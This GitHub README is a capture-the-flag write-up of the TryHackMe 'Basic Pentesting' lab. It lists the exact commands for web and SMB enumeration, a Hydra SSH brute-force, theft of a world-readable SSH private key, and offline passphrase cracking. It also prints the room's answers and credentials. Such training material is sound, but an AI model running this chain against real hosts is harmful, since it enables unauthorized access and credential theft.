Skip to content

About

Basic Pentesting on TryHackMe — gobuster/enum4linux recon, Hydra SSH brute-force, and cracking a world-readable id_rsa with ssh2john to pivot and escalate.

Topics

Resources

Stars

0 stars

Watchers

0 watching

Forks

Latest commit

 

History

2 Commits

Folders and files

NameName
Last commit message
Last commit date
 
 
 
 
 
 

Repository files navigation

Basic Pentesting — TryHackMe | Penetration Test Report

A full engagement walkthrough of the Basic Pentesting room on TryHackMe, documented in a VAPT-report style — reconnaissance through to full compromise. The attack chain moves from service discovery, through web and SMB enumeration, to an SSH foothold via password brute-forcing, and finally privilege escalation by stealing and cracking a world-readable SSH private key.


Machine Profile

Room Basic Pentesting
Platform TryHackMe
Difficulty Easy
Target IP 10.49.129.42
Target OS Ubuntu Linux (Samba host BASIC2, WORKGROUP)
Objective Compromise the host and recover the final stored credential
Tester Aihik Chakraborty (github.com/Aihikk)
Environment Kali Linux 2025.4 (VMware) over TryHackMe VPN

Note: TryHackMe assigns a fresh IP on every deploy. This engagement used 10.49.129.42; substitute your own if you replay the room.


Executive Summary

The target was fully compromised through a chain of common misconfigurations rather than a single critical exploit. An exposed web directory (/development) leaked two user initials and a note confirming that one account used a weak, already-cracked password. SMB enumeration resolved the actual usernames (jan, kay). A dictionary attack against SSH recovered jan's password, granting an initial foothold. From there, kay's SSH private key was found with insecure (world-readable) permissions, exfiltrated, and its passphrase cracked offline — yielding access to kay and the final stored credential in pass.bak.

Result: Initial access as jan → lateral movement to kay → recovery of the final password.

Key Findings

# Finding Severity
1 Weak, dictionary-guessable SSH password (jan) High
2 World-readable SSH private key in another user's home directory High
3 Weak passphrase on SSH private key (present in rockyou.txt) High
4 Sensitive information disclosure via exposed /development directory Medium
5 SMB null-session user and share enumeration Medium

Tools Used

nmap · gobuster · enum4linux · smbclient · hydra · ssh / scp · ssh2john · john


1 — Reconnaissance

A service/version scan against the target:

nmap -sV 10.49.129.42

Six open ports are returned:

Port Service Version
22 SSH OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
80 HTTP Apache httpd 2.4.41 (Ubuntu)
139 NetBIOS-SSN Samba smbd 4
445 Microsoft-DS Samba smbd 4
8009 AJP13 Apache Jserv (Protocol v1.3)
8080 HTTP Apache Tomcat 9.0.7

Nmap service scan

Takeaway: two web surfaces (80, 8080), SMB (139/445), and SSH (22). SMB + SSH together signal a classic enumerate users → brute-force path.


2 — Web Enumeration

2.1 Directory Brute-Force

gobuster dir -u http://10.49.129.42/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Gobuster discovers a hidden directory:

/development          (Status: 301) [--> http://10.49.129.42/development/]

Gobuster directory brute-force

2.2 Exposed Directory Listing

Browsing http://10.49.129.42/development/ reveals an open directory index containing two plaintext notes — dev.txt and j.txt:

/development directory index

2.3 dev.txt — Technology Disclosure

2018-04-23: ...messing with that struts stuff... using version 2.5.12... -K
2018-04-22: SMB has been configured. -K
2018-04-21: I got Apache set up. Will put in our content later. -J

The notes are signed by two users, K and J, and disclose that the server runs Apache Struts 2.5.12.

dev.txt notes

2.4 j.txt — Password Hint

For J:
I've been auditing the contents of /etc/shadow... and I was able to crack
your hash really easily. You know our password policy, so please follow
it? Change that password ASAP.
-K

This is the critical lead: J's password is weak and crackable, directing the attack toward brute-forcing that account.

j.txt password hint


3 — SMB Enumeration

With 139/445 open, enumerate SMB to resolve the real usernames behind "J" and "K".

enum4linux 10.49.129.42

The scan runs through workgroup, nbtstat, and session checks:

enum4linux — target & workgroup info

It confirms the host is a Samba Server 4.15.13-Ubuntu (BASIC2, WORKGROUP) and enumerates shares via a null session:

enum4linux — OS info & share enumeration

Crucially, RID cycling resolves the local users:

S-1-22-1-1000  Unix User\kay
S-1-22-1-1001  Unix User\jan
S-1-22-1-1002  Unix User\ubuntu

enum4linux — local users (kay, jan, ubuntu)

This confirms jan = "J" (the weak account) and kay = "K".

3.1 Anonymous Share Access

The Anonymous share allows a null session. Listing it exposes a staff.txt file:

smbclient //10.49.129.42/Anonymous -N
smb: \> ls
smb: \> get staff.txt

Anonymous SMB share listing

Reading staff.txt:

Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all
in fun, but this is how mistakes happen. (This means you too, Jan!)
-Kay

staff.txt contents

This reinforces that jan and kay are the active users, with jan repeatedly flagged as the careless one.


4 — Exploitation: SSH Password Brute-Force

Given the confirmed hint that jan uses a weak password, run a targeted dictionary attack against SSH:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.49.129.42

Hydra recovers valid credentials:

[22][ssh] host: 10.49.129.42   login: jan   password: armando
1 of 1 target successfully completed, 1 valid password found

Hydra SSH brute-force success

Credentials obtained: jan : armando


5 — Initial Access

Authenticate over SSH with the recovered credentials:

ssh jan@10.49.129.42
# password: armando

The host key is accepted and the jan session is established:

SSH login as jan

Foothold confirmed — we land in jan's shell:

jan interactive shell


6 — Post-Exploitation & Lateral Movement

Enumerating /home, a second user directory kay contains a pass.bak file — but jan cannot read it:

cd /home/kay
ls -la
cat pass.bak        # → Permission denied

pass.bak is owned by kay with -rw------- permissions. However, kay's .ssh directory is world-readable, exposing the private key id_rsa:

cd /home/kay/.ssh
ls -la
# -rw-r--r-- 1 kay kay 3326  id_rsa        <-- readable by everyone

Lateral movement — kay's readable SSH key

Misconfiguration identified: a private SSH key readable by other local users — the pivot point to kay.


7 — Credential Access: Key Theft & Cracking

Inspecting the key shows it is passphrase-protected (Proc-Type: 4,ENCRYPTED), so it can't be used directly:

Encrypted id_rsa private key

Pull the key to the attacker box (SCP, or copy its contents), then convert it to a John-compatible hash:

chmod 600 id_rsa
ssh2john id_rsa > hash.txt
cat hash.txt

ssh2john hash extraction

Crack the passphrase offline with rockyou.txt:

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

John recovers the passphrase almost instantly:

beeswax          (id_rsa)
1g 0:00:00:00 DONE ... Session completed.

John cracks the key passphrase

Obtained: kay's private key + passphrase beeswax.

Note: when capturing the key by copy-paste out of the terminal, ssh2john may report "id_rsa is not a valid private key file" — the paste drops or mangles the -----BEGIN/END----- lines. Transferring via scp avoids this by copying the file byte-for-byte.


8 — Privilege Escalation & Loot

Log in as kay using the cracked key and passphrase:

ssh -i id_rsa kay@10.49.129.42
# Enter passphrase for key 'id_rsa': beeswax

SSH access as kay

Now authenticated as kay, read the previously locked file:

cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Final password recovered from pass.bak

Objective achieved — the final stored credential is recovered and the box is compromised end to end.


Attack Chain at a Glance

nmap (6 ports: 22,80,139,445,8009,8080)
  └─> gobuster → /development  (dev.txt: Struts 2.5.12 | j.txt: "J has weak password")
        └─> enum4linux  → users jan, kay, ubuntu   +  smbclient Anonymous → staff.txt
              └─> hydra ssh (jan)  → jan:armando                 [ INITIAL ACCESS ]
                    └─> /home/kay: pass.bak locked, but .ssh/id_rsa world-readable
                          └─> ssh2john + john  → passphrase: beeswax
                                └─> ssh -i id_rsa kay  → cat pass.bak   [ FULL COMPROMISE ]

Findings & Remediation

# Finding Impact Remediation
1 Weak SSH password — jan:armando found in rockyou.txt Direct remote foothold via brute force Enforce a strong password policy; deploy fail2ban/rate-limiting; prefer key-based auth and disable SSH password login.
2 World-readable SSH private key — /home/kay/.ssh/id_rsa readable by all users Any local user can steal the key and impersonate kay Set chmod 600 on private keys and 700 on .ssh; audit home-directory permissions.
3 Weak key passphrase — beeswax cracked offline from rockyou.txt Defeats the last protection on a stolen key Use long, random passphrases; rotate any exposed key immediately.
4 Information disclosure — /development exposed users + a password-strength hint Hands an attacker usernames and attack direction Remove sensitive notes from web roots; disable directory listing (Options -Indexes); restrict access.
5 SMB null-session enumeration — enum4linux/smbclient listed users and the Anonymous share Confirms valid usernames and leaks internal notes Restrict anonymous SMB access; set restrict anonymous; remove unneeded shares.

TryHackMe — Room Answers

Task question Answer
Hidden directory on the web server development
Username (from enumeration) jan
Password (brute-forced) armando
Service used to gain access (abbreviation, caps) SSH
Other user found kay
What to do with the id_rsa found Crack its passphrase to log in as kay
SSH key passphrase beeswax
Final password obtained heresareallystrongpasswordthatfollowsthepasswordpolicy$$

Lessons Learned

  • Enumeration drives everything. The whole chain unlocked from two text files and a user list — no exploit code required. Breadth of recon (web and SMB) is what connected the dots.
  • Permissions are a privilege-escalation surface. The pivot to kay hinged on one over-permissive .ssh directory — file-permission hygiene matters as much as patching.
  • Offline cracking defeats "protected" keys. A passphrase only helps if it isn't sitting in a wordlist.
  • Prefer SCP over copy-paste for keys to avoid the ssh2john "not a valid private key" trap.

Disclaimer

This report documents work performed against a deliberately vulnerable, authorized training machine on TryHackMe within an isolated lab. The techniques shown are for educational and defensive-awareness purposes only. Never test systems you do not own or have explicit written permission to assess.

About

Basic Pentesting on TryHackMe — gobuster/enum4linux recon, Hydra SSH brute-force, and cracking a world-readable id_rsa with ssh2john to pivot and escalate.

Topics

Resources

Stars

0 stars

Watchers

0 watching

Forks

Releases

Packages

Contributors